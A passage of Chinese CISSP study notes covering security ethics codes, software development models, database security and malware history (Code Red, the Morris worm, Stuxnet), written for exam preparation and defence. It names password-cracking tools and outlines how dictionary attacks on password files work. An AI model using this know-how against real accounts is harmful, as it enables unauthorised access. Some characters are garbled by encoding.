让所有新员工签署协议,使其同意在调查期间可搜寻和没收任何必要的 证据,这已经变得越来越常见。 35、事故响应过程的最后一个阶段是召开“经验教训总结”(lesson learned)会议。 36、在事故发生之前,很有必要与适当的执法代理机构建立良好的关系。 可预先确定一名联系人作为组织与执法部门的联络人员。两点好处:首 先,能够让执法部门从联络人那里了解组织的想法;其次,允许联络人 与执法人员建立良好的工作关系。 37、(ISC)2即International Information Systems Security Certification Consortium,其道德规范提供CISSP的行为准则,包含一个序言和4个准则。 这是CISSP必须签⫿同意遵守的。 38、序言:社会安全和福利、公益、对委托人的责任,对相互需求的负 责,我们均应遵守,且被视为遵守最高的道德行为标准。因此,严格遵 守这些标准是获取证书的条件。 The safety and welfare of society and the common good, duty to our principals, and to each other requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior. Therefore, strict adherence to this Code is a condition of certification. 39、道德规范包括如下准则:(社会责任、正直守法、尽职胜任、发展 职业) 保护社会、公共利益与基础设施,赢得必要的公众信心与信任。安全专业人员 具有很大的社会责任。我们担负着确保自己的行为使公众受益的使命。 行为得体、诚实、公正、负责和遵守法律。对于履行我们的责任来说,诚实正 直是必不可少的。如果组织、安全团体内部的其他人或一般公众怀疑我们ᨀ供的 指导不准确,或者质疑我们的动机,那么我们就无法履行自己的职责。 为委托人ᨀ供尽职的、胜任的服务工作。尽管要对整个社会负责,但是也会对 专门对雇用我们来保护其基础设施的人负责。我们必须确保为组织ᨀ供无偏见的、 完全胜任的服务。 发展和保护职业。这个职业也在不断变化。作为安全专业人员,我们必须确保 掌握最新的知识并且贡献到社会的公共知识体系中。 40、互联网顾问委员会(Internet Advisory Board,IAB)考虑到互联网发 展中出现的滥用情况,于1989年1月发布了“道德规范和互联网(Ethics and the Internet)(RFC 1087)” ,这份声明被认为是不道德行为的概括 列表。主要有:试图未经授权访问Internet;破坏Internet正常使用;浪费 资源的行为(人、容量、计算机);破坏信息完整性的;危害用户隐私 的。 41、计算机道德规范协会(Computer Ethics Institute)在1992年制定了10 条戒律: 1) 不准使用计算机危害他人。harm 2) 不准妨碍他人的计算机工作。Interfere 3) 不准窥探他人的计算机文件。snoop 4) 不准使用计算机进行偷盗。 5) 不准使用计算机作伪证。bear false witness. 6) 不准私自复制未付费的专用软件。 7) 不准未被授权使用他人的计算机。 8) 不准盗用他人的知识产品。 9) 必须考虑所编写程序或所设计系统的社会后果。 10) 必须总是以确保关心和尊重同事的方式使用计算机。 此外,还有一个可供参考的道德准则是通用可接受系统安全准则(GASSP, Generally Accepted System Security Principles) 领域8-软件开发安全 第20章 软件开发安全 1、编程人员不易在解释型代码中插入恶意代码,因为终端用户可以看到 代码。 2、第 1 代语言(IGL):机器语言;2GL:汇编语言;3GL:编译语言 (如C);4GL试图接近于自然语言,包括数据库使用的SQL;5GL允许编 程人员创建使用可视接口的代码。 3、对于OOP模型,子类可以有父类的所有方法,并且有额外的特定方法。 4、高内聚就是内部关系紧密团结,松耦合就是和别人的交互很简单。内 聚cohesion,Cohesion describes the strength of the relationship between the purposes of the methods within the same class. 5、为了确保在软件的安全策略和机制能够在系统的整个生命周期内被正 确实现,可使用保证过程(Assurance Procedures),它通过正规化的过 程,在系统生命周期内构建信任。TCSEC称之为生命周期保证。 6、注意要对用户的输入做验证,检测不寻常的字符。应该在服务器端作 输入验证,浏览器的代码容易受到用户的操纵,因此很容易被绕开。 7、在大多数软件系统中,故障防护(fail-secure)状态是恰当的,因为 能够防止未授权访问。微软的Blue-screen-of-Death,可以理解为failsecure,虽然他是STOP错误。 8、一旦出现Fail-secure,编程人员就应当考虑接下来发生的活动。可能 的选项是:停留在此状态,或者自动重启系统。前者要求管理员人工重 启系统,后者不要求人工干预。 9、在有限的一些环境中,实现应急开放(fail-open)的故障状态可能更 为合适。这种方式有时适用于多层安全系统中较低层的组件。应急开放 系统的使用应当极为谨慎。必须明确验证用于该模式的业务要求。需要 确保能够采用其他适当的控制来保护组织的资源。所有安全控制都采用 fail-open的情况是极为罕见的。 10、维护安全性经常要权衡用户友好性和功能性。三角形,每个角是一 个性。 11、系统开发生命周期:概念定义(Conceptual Defination )、需求确定、 控制规格说明(Control specifications development )、设计审查、代码审 查、用户验收、维护变更。 12、概念定义(Conceptual Defination)是一个简要的摘要,由利益相关 方协商的,规定了项目用途和大体需求,使外行在短时间内对项目具备 高度概括性的理解,定期阅读此声明有助于团队重新瞄准自己的目标。 13、控制规格说明,是在项目早期就把适当的控制设计在系统中。需要 记住的是,将安全性设计到系统中不是一次性过程,并且必须主动进行。 14、许多较为成熟的工程学科(例如,土木工程、机械工程和电子工程) 从业者认为软件工程根本不是工程学科。他们坚持认为软件工程仅仅是 一些混沌过程的组合,有时由于某种原因经过管理成为可工作的解决方 案。实际上,在目前的开发环境中出现的一些软件工程只是依靠“胶带 和铁丝网(“duct tape and chicken wire.”)”组合在一起的编码。 15、瀑布模型:最初是由 Winston Royce 在 1970 年开发的,有 7 个开 发阶段。在每个阶段完成时,项目会进入下一个阶段。现代的瀑布模型 准许开发返回到先前的阶段,从而纠正在后续阶段发现的错误。这被称 为瀑布模型的反馈循环特征(feedback loop characteristic)。 16、螺旋模型:1988 年,TRW 的 Barry Boehm ᨀ出了一种替代的生命周 期模型,允许瀑布类型处理过程多次反复。封装了许多迭代的其他模型 (也就是瀑布模型),所以被称为元模型或“模型的模型”。螺旋模型 为瀑布模型受到的主要批评ᨀ供了一个解决方案,也就是说,如果技术 需求和客户需求发生变化,需要改进系统,就允许开发人员返回到计划 编制阶段。 17、敏捷开发:17 位敏捷开发方法的先驱在 2001 年聚集在一起,制作了一 份名为“敏捷开发宣言”:“我们正在发现更好的方法以开发软件,通过这 样做和帮助他人这样做。通过这项工作,我们可以获得以下价值:个体与交 互重于过程和工具;有效的软件重于完整的文档;客户合作重于合同谈判; 响应变更重于遵循计划;也就是说,虽然有价值的条目在右边,但我们更重 视条目的左边。” 18、敏捷宣言的12条原则: 1、最高优先级是早期和持续交付有价值的软件; 2、欢迎不断变化的需求甚至是开发后期;利用变化为客户取得竞争优势; 3、在几星期到几个月的时间里以较短的时间频繁ᨀ供能用的软件; 4、业务人员和开发人员每天都要在一起工作; 5、要激发个人,给他们所需要的环境和支持,并且相信他们能够完成 这项工作; 6、传递信息最有效率和最优效果方法是面对面交谈; 7、可用的软件是首要的度量标准; 8、敏捷过程促进可持续开发,出资人、开发者和用户应该无限地保持 同一步调; 9、持续关注技术的卓越性和良好的设计,这能ᨀ高敏捷度; 10、简单:最大化精简工作量的艺术,是最重要的; 11、最好的架构、需求和设计源于自组织团队。 12、在团队内部定期思考如何变得更有效,并按这样来修正及优化自 身的行为。 19、Carmnegie Mellon 大学的软件工程学院(SEI)ᨀ出了软件能力成熟 度模型(Software Capability Maturity Model,缩写为 SW-CMM. CMM 或 SCMM),这种模型主张所有从事软件开发的组织都依次经历不同的成 熟阶段。 1、初始级,无组织无定义; 2、可重复级,开始有组织的重用代码(同类项目期望有相同的结果);有:需 求管理、项目计划编制、软件项目跟踪和监督、软件转包合同管理、软件质量保 证、软件配置管理。 3、定义级,按照一系列正式的、文档化的软件开发过程操作;有:组织过程 Focus、组织过程定义、培训计划、综合的软件管理、软件产品工程、团体之间 的协调和对等复审。 4、管理级:定量衡量。有:定量处理管理和软件质量管理 5、优化级。 注意:在可重复级阶段,出现基本的生命周期管理过程。 有: 缺陷预防、技术变更管理和过程变更管理。 20、SEI还开发了IDEAL模型:1、启动Initiating; 2诊断Diagnosing;3、建 立Establishing;4;行动Acting;5学习Learning; 1、 启动,列出变更的业务原因,提供支持,以及准备好恰当的基础设 施。 2、诊断,分析组织的当前状态,给出一般性建议。 3 、建立,采用诊断阶段的一般建议,制定行动计划。 4、行动,开发解决方案、测试、改进和实现解决方案。 5、 学习。组织必须不断分析其努力的结果,从而确定是否已实现期望 的目标,必要时建议采取新的行动,使组织重返正轨。 21、甘特图就是现实不同时间,项目和计划的相互关系。 22、计划评审技术(Program Evaluation Review Technique, PERT)is a project-scheduling tool,这种工具被用于在开发中判断软件产品的大小, 并且为风险评估计算标准偏差(Standard Deviation, SD)。PERT 将估计的 每个组件的最小可能大小、最可能的大小以及最大可能大小联系在一起。 PERT 被用于直接改进项目管理和软件编码,以便开发更有效的软件。随 着编程和管理能力得到改善,软件的实际生成大小应当更小。 23、在软件开发、质量保证和技术运维这些主要的 IT 职能之间存在脱节 的情况。这些职能,通常配备给不同类型的个人,并且还位于不同的组 织,通常彼此冲突。DevOps 方法通过将三种职能集中在一个操作模型 中来解决这些问题。传统方法导致很少发布,或许每年一次,但使用 DevOps 模型的组织通常每天部署代码多次。甚至可以每天部署几十甚至 几百次。 24、测试软件时也应职责分离。也即应当指定编程人员以外的人员进行 软件测试,从而避免利益冲突。第三方测试允许更广泛和更彻底的测试, 并且能够防止由于编程人员的偏见和爱好而影响测试结果。 25、测试也是白盒、黑盒、灰盒,灰盒是流行的软件验证方式,主要是 从用户的角度评估软件,也是分析输入输出,但测试人员会访问源代码, 并使用源代码帮助软件测试,但一般不分析程序的内部工作原理。 26、静态测试:通过分析源代码或编译的应用程序来评估软件的安全性, 不需要运行软件。通常使用自动化工具来检测bug,如缓冲区溢出。 27、动态测试:在运行时环境中评估软件的安全性,测试人员通常无法 访问基础的源代码。比如使用 Web 应用程序扫᧿工具来检测是否存在跨 站脚本、SQL 注入或 其他缺陷。在生产环境下的动态测试应始终仔细考 虑以避免意外中断服务。 28、代码仓库(code repositories ):它们作为开发人员放置源代码的中 心存储点。如 GitHub、Bitbucket 和 SourceForge还ᨀ供了版本控制、错 误跟踪、Web 托管、发布管理和支持软件开发的通信功能。 29、一定注意,不要在公共代码仓库中包含敏感信息,尤其是 API 密钥。 30、SLA里经常含有: 系统正常运行时间(如总工作时间的百分比) 最大连续停机时间(以秒 1 分钟为单位等) 高峰负荷(peak load)、 平均负荷(average load)、 诊断责任 (Responsibility for diagnostics) 故障切换时间(Fail-over time) 31、SLA通常还包括财务和其他合约商讨好的补救措施。例如,如果关键 线路中断超过 15 分钟,服务提供商可能同意放弃该线路上的所有费用一 周。 32、在 SaaS 环境中,大多数安全责任由供应商负责,但是组织的安全人 员也不能逃脱责任。他们负责监控供应商的安全,包括审计、评估、漏 洞扫描和旨在验证供应商是否保持适当控制的其他措施。 33、数据库管理系统(DBMS):注意有两种重要的DBMS体系结构:层 次式数据模型、分布式数据模型。 34、层次式数据模型将关联的记录和字段组合为一个逻辑树结构。这会 导致一个“一对多”数据模型,其中的每个节点可能不具有子节点,也 可能具有一个或多个子节点,但是都只具有一个父节点。最常用的层次 模型实现为LDAP模型。这种模型也用在 Windows 注册表结构和不同的文 件系统中使用,不过较新的数据库产品通常不采用该模型。 35、分布式数据模型将数据存储在多个数据库中,但用户的角度看,将 数据库理解为单个实体。每个字段都具有许多子字段和父字段。因此, 分布式数据库的数据映射关系是多对多。分布式数据库系统与集中式数 据库系统相比,具有如下基本特征:物理分布性、逻辑整体性、站点自 治性、分布透明性。 36、基本上大家都在使用关系型数据库RDBMS。关系数据库是由行和列 组成的平面二维表。关系数据库的主要构件是表(也被称为关系),每 个表都包含一组相关的记录。例如,某个销售数据库可能包含: Customers 表,包含组织中所有客户的联系信息。Sales Reps 表,包含组 织中销售人员的身份信息。Orders 表,包含每个用户所下订单的记录。 37、关系中行的数量叫做基数(cardinality),列的数量叫做度 (degree)。关系的域(domain)是一组属性可以采用的允许值。下图 说明了 Customers 表的示例。 上表基数为3,度为8. 38、主键:从候选键中选出的用来唯一标识表中记录的键被称为主键。 (候选键是可以唯一标识表中记录的属性的集合)。每个表都只有一个 主键,RDBMS 强制实施了主键的唯一性。在上图所示的Customers 表中。 CompanyID 很可能就是主键。 39、外键:被用于强制在两个表之间建立关系(也称为参照完整性, referential integrity)。参照完整性确保:如果一个表包含一个外键,那 么这个外键在另一个表中是主键。上图中的Sales Rep字段是外键,它是 Sales Reps表中的主键。 40、所有关系数据库都使用结构化查询语言(SQL),每个 DBMS 供应 商实现的 SQL 版本略有不同 (如 Microsoft公司的Transact-SQL和Oracle公 司的PL/SQL),但是都支持一个核心特性集。SQL最主要的安全特性是授 权粒度。这意味着 SQL 允许能通过表、行、列,甚至是些情况下单独的 单元来限制用户访问。 41、SQL本身被分为两个截然不同的组件:数据定义语言(DDL),允许 创建和更改数据库的结构(称为schema),数据操纵语言(DML),允 许用户与模式内包含的数据交互。 42、数据库开发人员致力于创建组织有序的、有效的数据库。为此,开 发人员定义了若干被称为范式(Normal form)的组织级别。使数据库表 遵从范式的过程被称为规范化(Normalization)。最常见的三种形式是: 第一范式 1NF、第二范式2NF、第三范式3NF,都是为了:减少表中的冗 余,消除错误放置的数据、执行其他许多清理性任务。范式是渐进的, 换句话说,要采用2NF格式,首先必须遵从1NF格式;要采用3NF 格式, 首先必须采用2NF 格式 43、数据库事务:可以显式和隐式地使用,确保数据执行的完整性。作 为一个组的这些SQL指令要么全部成功,要么全部失败。事务的一部分成 功而另一部分失败的情况不能出现。比如: BEGIN TRANSACTION UPDATE accounts SET balance = balance + 250 WHERE account_ number = 1001; UPDATE accounts SET balance = balance - 250 WHERE account_ number 2002 END TRANSACTION 44、一个事务成功完成时,也即这个事务被ᨀ交给数据库(commited), 这就不能取消了(undone)。(除非冲正的需要再来一笔交易。)事务 的ᨀ交可以是显式地使用COMMIT 命令;可以是隐式的,也就是成功到 达事务结束进行ᨀ交。 45、如果必须在中间中止事务,可以显式地使用 ROLLBACK 命令进行回 滚操作,也可以是硬件或软件故障引起的隐式回滚。当一个事务被回滚 时,数据库会将自身还原至这个事务开始前的状态。 46、所有的数据库事务都具有 4 个必需的特征,即ACID:原子性 (atomicity)、一致性(consistency)、隔离性(isolation)以及持久性 (Durability)。 47、原子性:要么全有要么全无。一致性:数据库的规则不能破坏,比 如主键唯一。隔离性:一个事务更改相同数据前,必须等前一个事务结 束。持久性:一旦ᨀ交给数据库就会被存储起来。 48、以下是几个DBMS安全特性:多级安全性、视图、并发性控制、语义 完整性、时间特性、细粒度控制(内容相关控制、单元抑制)、上下文 控制、多实例(polyinstantiation)、噪声和扰动(Noise and perturbation)。 49、要求多级安全(multilevel security)时,将不同分类级别和或“知其 所需’ 需求不同的数据混合在一起被称为数据库污染(Contamination), 这是一个重大的安全风险。通常,管理员会通过部署可信前端(trusted front end)给旧式的或不安全的 DBMS 添加多级安全性。 50、视图(views):实现多级安全性的另一种途径是使用视图。视图能 够被用于整理来自多个表的数据、聚合记录、限制用户访问特定的属性 或记录。视图被存储为 SQL 语句而不是被存储为数据表。这样可以显著 减少所需的数据库空间,允许视图违反应用于数据表的规格化规则。当 然,从复杂的视图中检索数据的时间要明显长于从表中检索数据的时间。 51、并发性控制:并发性或编辑控制(Concurrency or Edit control)是一 种预防性的安全机制,这种机制试图使数据的完整性和可用性受到保护。 并发性使用“锁定”功能允许已授权用户更改数据,同时拒绝其他用户 查看或更改数据元素。注意,审计工具可以利用并发性跟踪字段的变化。 52、语义完整性(semantic integrity):语义完整性确保用户的动作不会 违反任何结构上的规则。它检查存储的所有数据类型都位于有效的域范 围内,确认系统遵守唯一性约束。 53、时间和日期标记,常常出现在分布式数据库系统中。在每个更改事 务上添加时间标记,然后将这些更改分发或复制至其他数据库成员时, 所有变化会应用于所有成员,而且是按照正确的时间顺序实现变化。 54、细粒度控制:有两个示例: 内容相关的访问控制(content dependent):重点基于要访问对象的内 容或有效载荷进行控制。因为必须在逐个访问对象的基础上做出决定, 所以内容相关的访问控制增加了处理开销。 单元抑制(Cell suppression):对单独的数据库字段或单元隐藏或强加 更安全的约束。 55、上下文相关的访问控制(context dependent):任何单个元素本身 看上去无关紧要,但是在较大的上下文环境中就会表露出这是不是可以 允许。 56、示例: “Julio 有权访问文件吗?” 对于内容相关访问控制:系统检查 ACL 并返回响应: “Julio 能够访问 这个文件,但是只能执行读操作。” 对于上下文相关访问控制:系统检查:Julio 进行了其他哪些访问尝 试?这个请求是否不符合安全请求的顺序?这个请求是否在系统允许的 访问时间内(上午 8:00~下午 17:00) ᨀ出?如果上述问题的答案都与一 组事先设置的参数相符,那么 Julio 就能够访问文件 A;否则,他就不能 访问文件 A。 57、多实例(polyinstantiation):在一个表中有两行或更多行具有相同 的主键元素!在不同分类级别的用户使用时返回不同的数据行,常常被 用作防范推理攻击。 58、比如:一个数据库表中包含巡逻舰艇的位置(通常都是秘密级信 息),如果一艘特殊的舰艇正在暗中执行到达绝密位置。如果数据库管 理员简单地将其位置分类更改为绝密,那么秘密级用户在不能查询这艘 舰艇的位置时就会知道发生了一些不正常的事情。如果应用多实例方法, 表中可能会插入两个记录。第一条属于绝密级分类,将反映这艘舰艇的 实际位置,并且只对属于绝密安全级的用户可用。第二条记录属于秘密 级,指出舰艇正在进行例行巡逻,并且向属于秘密安全级的用户显示这 一内容。 59、噪声和干扰(Noise and perturbation):DBMS 中插入错误的或欺骗 的数据,从而重定向或阻挠信息机密性攻击。在使用此技术时,必须非 常小心,确保插入数据库中的噪声不会影响业务操作。 60、开放数据库互连(ODBC)是一种数据库特性,允许应用程序与不同 数据库类型通信。ODBC 扮演了应用程序和后端数据库驱动程序之间代理 的角色,使应用程序编程人员能够自由创建解决方案,而不必考虑后端 的数据库系统。 61、主存就是RAM;辅存就是硬盘、磁带、CD等;虚拟内存使用辅存模 拟主存,如用硬盘模拟RAM;虚拟存储器用主存模拟辅存,比如供操作 系统使用“RAM盘”,在RAM中模拟C盘,那叫一个快,但断电后不恢复。 62、在敏感的环境下,如果怕攻击者绕过操作系统直接访问物理存储介 质如硬盘,可以使用加密文件系统的方法。 63、隐蔽存储通道(Covert storage channels ): 不同分类级别的用户,可以通过共享内存或者硬盘,偷偷传输敏感的 数据; 可以通过操纵磁盘的可用空间或文件的大小,在安全级别间偷偷传送 信息。 64、专家系统:专家系统试图具体化人类在某个特殊学科累积的知识, 一些研究已经表明,专家系统常常能够做出比人类的常规决策更好的决 定。每个专家系统都有两个主要的组件:知识库和推理引擎。 65、知识库(knowledge base)以一些列的if then对人类专家的知识进行 编码: 如果飓风是 4 级或更高级别的风暴,那么洪水-般会达到海拔 20 英尺高。 如果飓风的风速超过了每小时 120 英里,那么木质结构的建筑物将被毁坏。 如果是在飓风季节末期,那么飓风在到达海岸时会变得更强。 在实际的专家系统中,知识库将包合成百,上千个如上所示的断言。 66、推理引擎(inference engine)使用逻辑推理和模糊逻辑技术的组合 对知识库的信息推理做出结论。仍然以飓风为例,用户通知专家系统4 级飓风已经接近海岸,风速为平均每小时 140 英里。推理系统基于知识 做出撤离建议。 67、专家系统的优劣完全取决于知识库和推理引擎的决策制定算法,优 点是不受情绪影响,在紧急事件、股票交易等场景下表现出色,贷款机 构采用专家系统作出信用决策,而不是贷款主管自言自语说:“好,虽 然 Jim 一直没有准时付账,但是他看起来是个相当不错的人。” 68、模糊逻辑(fuzzy logic):与利用“黑白”数据归类的代数方式或集 合论的严格数学相比,这种技术的设计更接近于人类的思维模式。通过 替换使用模糊的界限,模糊逻辑允许算法思考控制人类思维的“灰度梯 度”。专家系统通过下列 4 个步骤或阶段使用模糊逻辑:模糊化、推理、 合成以及逆模糊化。 69、神经网络:典型的神经网络涉及很多层次的合计(Summation),每 一层的合计都需要加权信息以反映在决策制定过程中的相对重要性。权 值的确定可以在培训阶段实现,在这个阶段,网络被ᨀ供正确决策已知 的输入信息。这个算法随后进行这些决策的逆向工作,从而为计算链中 的每个节点确定正确的权值。这种活动被称为 Delta 规则或学习规则。 通过使用 Delta 规则(Delta rule or learning rule ),神经网络就能够从经 验中学习知识。 70、决策支持系统(Decision Support System, DSS)是一种知识型应用, 它分析业务数据,并且以更容易做出业务决策的形式ᨀ供给用户,比如 以图形方式ᨀ供信息,并链接概念和内容并指导操作者。决策支持系统 更多被视为信息型应用而不是操作型应用。DSS 常常被知识型员工(例 如服务台人员或客户支持人员)和销售服务人员(例如电话推销员)所 使用。很多DSS还有专家系统做支持。 71、专家系统、神经网络都在计算机安全领域有很多应用。比如:可以 帮助管理员对大量的日志记录和审计跟踪数据进行分析。 第21章 恶意代码与应用攻击 1、病毒4 种常见的传播技术:主引导记录感染、文件感染、宏感染和服 务注入。 2、主引导记录病毒(Master Boot Record, MBR):是已知的最早的病毒 感染形式。这些病毒攻击MBR(在硬盘、软盘或CD/DVD等可启动介质上), 这是在启动过程中加载操作系统的部分。由于 MBR 非常小(通常只有 512 字节),所以病毒将主要的代码存储在存储介质的其他部分。在系 统读取受感染的 MBR 时,病毒会引导系统读取并且执行在另一个地方存 储的代码,从而将全部的病毒加载到内存中执行。 3、文件程序感染病毒:感染可执行文件,并且在操作系统试图执行这些 文件时被触发。病毒可能只是对可执行程序进行了少许改动,也可能替 换了整个文件。一般的病毒不使用隐形或加密这样障眼法技术,通过比 较感染前后的文件特性(如大小和修改日期)或散列值,常常可以很容 易地检查出这种病毒。 4、同伴病毒(companion virus):同伴病毒依靠基于 Windows 的可执 行文件 com、exe 和bat这个先后顺序的操作。例如,硬盘上有一个名为 game. exe 的程序,那么同伴病毒可能会使用名字 game. com。如果你简 单地键入“game“,那么操作系统将执行这个病毒文件 game. com,而不 是实际要执行的文件 game. exe。所以,在命令行工具下执行文件,要避 免快捷方式并且使用具体的文件名。 5、宏病毒:最早出现在 20 世纪 90 年代中期,它采用拙劣的技术感染 Microsoft Word文档(使用VBA脚本语言编写恶意代码)。1999 年, Melissa 病毒通过 Word 文档传播,利用 Microsoft Outlook 中的安全漏洞 进行复制。在 2000 年初,臭名昭著的 I Love You 病毒很快步其后尘, 也利用相似的漏洞进行传播。 6、服务注入病毒:病毒将自己注入到操作系统的可信运行进程中,如 svchost.exe、winlogin.exe 和 explorer. exe。所以能够绕防病毒软件的检 测。一个防护办法是确保允许读取Web内容的所有软件(如浏览器、媒 体播放器、helper)打上最新的安全补丁。 7、反病毒软件的措施:能清除病毒就杀毒清除;发现有病毒却不知道怎 么杀,就隔离它;如果安全策略不允许隔离,或者文件太危险超过阈值, 就删掉它。 8、许多防病毒软件使用基于启发式的机制检测潜在的恶意软件感染。这 些方法分析软件的行为,寻找病毒活动的迹象,例如试图ᨀ高特权级别、 掩盖踪迹,以及更改不相关的或操作系统的文件。 9、Tripwire 被设计用于警示管理员发生未授权的文件修改,常常被用来 检测对 Web 服务器的破坏和类似的攻击。对关键的系统可执行文件被修 改,Tripwire也能ᨀ供某些病毒感染的警告。这通过维护系统所有文件的 散列值数据库来实现。 10、新类型的病毒为了挫败反病毒软件,使用狡猾的技术逃避检测,复 合病毒、隐形病毒、多态病毒和加密病毒。 复合病毒:使用多种传播技术,比如感染文件+感染MBR。 Multipartite Viruses 隐形病毒:Stealth viruses ,通过对操作系统的实际篡改来欺骗反病毒 软件,比如覆盖MBR后,随后通过修改操作系统的访问功能,当反病毒 软件包向操作系统请求读MBR时,给他一个正常的。 多态病毒:Polymorphic virus,病毒在传播时会修改自己的代码。导致 每次感染新的系统时病毒的特征(也称签名)略有不同。目的是通过连 续改变特征使得特征型反病毒软件包失效。然而,反病毒软件供应商已 经能够都能够检测出已知的多态病毒。但就是生成这个特征会花费供应 商较长的时间,导致多态病毒有更长的时间肆虐。 加密病毒:很像多态病毒,但不是通过改变代码来生成不同的特征,而 是在每个感染时都使用不同的密钥,使得主代码在每个系统上都呈现出 完全不同的样子。加密病毒使用一个很短的、被称为病毒解密程序的代 码段,这个代码段包含必要的密码学信息,由于这个指示特征,加密病 毒也容易被最新的反病毒软件包识破。 11、骗局(hoax)是一种无聊的资源浪费,总是通过邮件说有一个传闻 中的所谓“病毒”,说让大家小心一种很厉害的新病毒,其实根本没事。 Good Times这种所谓的“病毒”从1994年就出现了,直到今天还在传播。 12、逻辑炸弹:是感染系统并且在达到一个或多个满足的逻辑条件(例 如,时间、程序启动、Web 站点登录等)前保持休眠状态的恶意代码对 象。大多数逻辑炸弹被软件开发人员编入用户定制的应用程序中,有些 人的目的是在被突然解雇时破坏公司的工作。 13、流氓杀毒软件:这类软件欺骗用户安装它,声称是一个防病毒包, 通常伪装成一个弹出广告,并模仿成安全警告的外观和感觉。一旦用户 安装软件,就会窃取个人信息或ᨀ示用户付款以“更新”流氓杀毒软件。 所谓“更新”只是禁用木马而已。 14、勒索软件:感染目标计算机,然后使用加密技术来加密存储在系统 上的文档、电子表格和其他文件,并使用只有恶意软件创建者知道的密 钥。接下来弹出警告要求支付赎金。最著名的是Cryptolocker。 15、蠕虫:不需要任何人为干预就可以传播自己。2001年夏天,Code Red 蠕虫对未安装补丁程序的IIS之间快速传播,它随机选择成百上千的IP 地址,查看这些主机是否运行存在漏洞的IIS版本。任何被找出的系统都 很快被破坏。然后破坏本地Web服务器上的HTML页面,将其改为: Welcome to http: / /www. Worm. Com! HackedBy Chinese! 并向系统植入一 个逻辑炸弹,这个逻辑炸弹将向 IP 地址 198.137.240.91 发起拒绝服务攻 击,该地址是白宫主页的Web 网站服务器。反应敏捷的政府 Web 站点 管理员在实际攻击发生之前便改变了白宫的 IP 地址。Code Red利用的IIS 漏洞的安全补丁早在前一个月左右就已由 Microsoft 发布。如果安全管理 员迅速地安装了这个补丁,那么 Code Red 将会是一种失败的病毒。 16、RTM与互联网蠕虫:1988年11月,计算机专业学生Robert Tappan Morris制造的一个恶意蠕虫被意外地释放到了互联网上并传播破坏了大 量的系统,蠕虫利用Unix的4个安全漏洞进行传播:Sendmail 调试模式漏 洞:这个漏洞准许蠕虫通过向远程系统上的 Sendmail 程序发送特殊的、 包含蠕虫代码的破坏性电子邮件来传播自己,远程系统在处理邮件时就 会被感染;密码攻击:使用字典攻击,通过使用一个有效系统用户的用 户名和密码来试图获得对远程系统的访问权服;finger漏洞:finger存在 一个缓冲区溢出漏洞,使得嬬虫能够进行传播;信任关系:在感染系统 后,蠕虫分析了网络中该系统与其他系统之间存在的信任关系且试图通 过可信路径传播。Morris只为其犯罪行为受到轻微控诉。根据1986年的 计算机违法犯罪法案(Computer Fraud and Abuse Act,CFAA),他被判 三年缓刑 、400 小时的社区服务、一万美元的罚款。Morris的父亲 Robert Morris当时是NSA下属国家计算机安全中心NCSC的主管。 17、震网(Stuxnet)蠕虫:2010年年中在互联网上出现,这种高度复杂 的蠕虫使用各种高级技术来传播,包括多个零日漏洞。震网病毒使用以 下传播技术:在本地网络上搜索未受保护的管理共享系统;利用零日漏 洞攻击 Windows 服务器上的服务和打印机后台处理程序;使用默认的数 据库密码连接系统;使用共享的 USB 设备进行传播。它实际上是在寻找 西门子制造的控制器系统,据称是用于生产核武器材料的系统,发现后, 它会执行一系列旨在摧毁连接到西门子控制器离心机的动作。震网标志 恶意代码世界里的两个主要演变:使用蠕虫对设施造成严重的物理损坏, 以及在国家之间的战争中使用恶意代码。 18、间谍软件(Spyware)会监控你的动作,并且向暗中监视你活动的远 程系统传送重要的细节。例如,将你的银行用户名和密码传送给间谍软 件的创作者。 19、广告软件(adware)与间谍软件极为相似,只是具有不同的目的。 广告软件使用多种技术在被感染的计算机上显示广告。最恶毒的广告软 件可能会监控你的购物行为并将你重定向至竞争者的 Web 站点。 20、注意:广告软件和恶意软件的作者通常利用流行的Web 浏览器第三 方插件来传播,他们发现插件已经具有强大的用户基础,这些插件被授 予权限在他们的浏览器内运行和或获取他们的信息。然后他们用原始插 件代码补充恶意代码。 21、反病毒:至少要在三个关键区域考虑反病毒是非常明智的:客户端、 服务器、内容过滤器(是指对入站和出站以及web流量进行内容过滤) 22、大多数反病毒软件都是特征型过滤器,所以,从病毒出现到能够发 现有一个延迟。针对这个问题,有两种常用的解决方案: 1.使用完整性检查软件(如Tripwire)扫᧿文件系统中意外的更改并定 期报告。 2.应当严格地维护和实施访问控制,从而限制恶意代码破坏数据和在网 络上传播的能力。 23、下列三种额外的技术能够防止受到活动内容内嵌的恶意代码的感染: Java沙箱技术:为 applet ᨀ供了一个隔离的环境,在这个环境中, applet 不需要访问关键的系统资源就能够安全地运行。 ActiveX 控件签名技术:利用数字签名来确保代码的来源可信。 操作系统级别的应用程序白名单:要求管理员指定批准的应用程序。仅 允许已知的良好应用程序运行。 24、零日漏洞最大的问题是:厂商出补丁慢、用户打补丁慢。 25、口令攻击:口令猜测、字典攻击。口令猜测表中815个口令中有300 个名字,其中70%是女性的名字。字典攻击有很多工具:JohntheRipper、 Cain& Abel、Ophcrack、Brutus、THC Hydra、L0phtCrack、Pwdump 和 RainbowCrack。每个工具都有专门的不同的操作系统和密码类型。 26、攻击者用John the Ripper把字典文件每个词汇都加密,然后在密码文 件中查找与加密字典相匹配的加密值。查找到某个匹配时,John the Ripper程序会报告用户名和密码(明文形式)。 27、社会工程学:攻击者常常可以通过与计算机用户、办公室中的饶舌 者和行政管理人员的“闲谈”获得敏感的个人信息。此外,攻击者有时 可以获得敏感的网络拓扑图或配置数据。 28、过分热心的管理员最常见错误是建立一系列强密码,并且将它们分 发给用户(并且禁止用户改变这个密码!),这是一个听起来十分安全 的策略。然而,用户在收到像 lmfOA8ft这样的密码时,他们将要做的第 一件事是将密码写在便签上并将其粘贴在计算机键盘的下面。这下可好! 29、很多版本的Unix和Linux都使用影子密码文件/etc/shadow. 这个文件包 含每个用户的实际加密密码,但是除了管理员外,任何人都不能访问这 个文件。公共可访问的文件/etc/passwd只是包含用户名的列表,它并不 包含发起字典攻击所需的必要数据。 30、防止缓冲区溢出漏洞:用户输入的值的长度不能超过任何存放它的 缓冲区的大小;不能输入类型无效的值(例如,将一个字符输入到一个 数字型变量中);不能超出参数范围(例如,用“也许”来回答结果只 能为“是”或“否的问题)。绝大多数缓冲区溢出漏洞都通过补丁来缓 解,软件供应商或操作系统供应商ᨀ供。 31、TOCTOU是时间性漏洞,是指计算机系统的资料与权限等状态的检查 与使用之间,因为某特定状态在这段时间已改变所产生的软件漏洞。不 要在check和Use之间留太多时间,避免你检查时他是有效的,但在他真 